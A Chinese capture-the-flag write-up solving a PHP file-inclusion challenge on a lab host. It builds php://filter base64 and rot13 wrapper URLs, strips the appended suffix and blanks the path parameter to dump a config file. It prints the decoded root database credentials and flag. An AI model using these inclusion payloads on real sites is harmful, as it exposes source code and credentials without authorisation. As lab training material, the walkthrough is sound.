CTF---Web---文件包含---05---base64+路径

文章目录

  • 前言
  • 一、题目描述
  • 二、解题步骤
    • 1、御剑扫描
    • 2、查看源码
    • 3、判断后缀
    • 4、路径构造
    • 5、base64解码
  • 三、总结


前言

题目分类:

CTF—Web—文件包含—05—base64+路径


一、题目描述

题目: 172.16.15.186/stage/8/

文件包含

二、解题步骤

1、御剑扫描

Step1:御剑扫描,得到robots.txt文件,既而得到ge_t_key.php
CTF---Web---文件包含---05---base64+路径_第1张图片

2、查看源码

直接去访问172.16.15.186/stage/8/ge_t_key.php,发现内容为空,因为源码中没有echo输出,这时候立马想到使用filter协议进行读取源代码
php://filter/read=convert.base64-encode/resource= ge_t_key.php

但是直接读取,http://172.16.15.186/stage/8/?php://filter/read=convert.base64-encode/resource=ge_t_key.php,发现失败,并不可以,

查看源代码,得到?m=&c=show&p=views&a=contact,参数a可变,其他不变
CTF---Web---文件包含---05---base64+路径_第2张图片

3、判断后缀

由此可访问http://172.16.15.186/stage/8/?m=&c=show&p=views&a=php://filter/read=convert.base64-encode/resource=ge_t_key.php,

页面回显为主页面,抓包,可知,程序在ge_t_key.php给我们自动加上.php后缀,所以将此链接中的.php去掉即可。
CTF---Web---文件包含---05---base64+路径_第3张图片

访问http://172.16.15.186/stage/8/?m=&c=show&p=views&a=php://filter/read=convert.base64-encode/resource=ge_t_key,还是报错。
CTF---Web---文件包含---05---base64+路径_第4张图片

4、路径构造

认真发现上下的url可以发现:其实,还有一个路径的问题

这里还会给我们自动加上路径views,但是根据robots.txt的提示,我们知道key文件在根目录下,并不在views里面,但是…/被过滤,无法跳级,那怎么办?其实直接把路径views删掉就可以了:

http://172.16.15.186/stage/8/?m=&c=show&p=&a=php://filter/read=convert.base64-encode/resource=ge_t_key
CTF---Web---文件包含---05---base64+路径_第5张图片

5、base64解码

得到base64编码,解码得到key{9105d2d148081731}

PD9waHANCiRjb25maWcgPSBhcnJheSgNCiAgICdob3N0JyA9Pidsb2NhbGhvc3QnLA0KICAgJ3VzZXInID0+J3Jvb3QnLA0KICAgJ3Bhc3MnID0+J3Jvb3QnLA0KICAgJ2NoYXJzZXQnID0+J3V0ZjgnLA0KICAgJ2RibmFtZScgPT4gJ2luY2x1ZGUnLA0KICAgJ0tleSc9Pic5MTA1ZDJkMTQ4MDgxNzMxJw0KCSk7

Base64解码为:


$config = array(
   'host' =>'localhost',
   'user' =>'root',
   'pass' =>'root',
   'charset' =>'utf8',
   'dbname' => 'include',
   'Key'=>'9105d2d148081731'
	);

三、总结

文件包含漏洞识别:

1、访问页面内容为空 —> 使用filter协议进行读取源代码(因为源码中没有echo输出)

2、访问不同页面时,get传参跳转

文件包含做题要点:

1、伪协议的选择(base64、rot13)

php://filter/read=string.rot13/resource
php://filter/read=convert.base64-encode/resource

2、确认读取路径

当无其他问题,但还是读不出页面时,可考虑路径问题

你可能感兴趣的:(CTF,刷题记录,web,CTF,web,文件包含,刷题记录,hgzzk)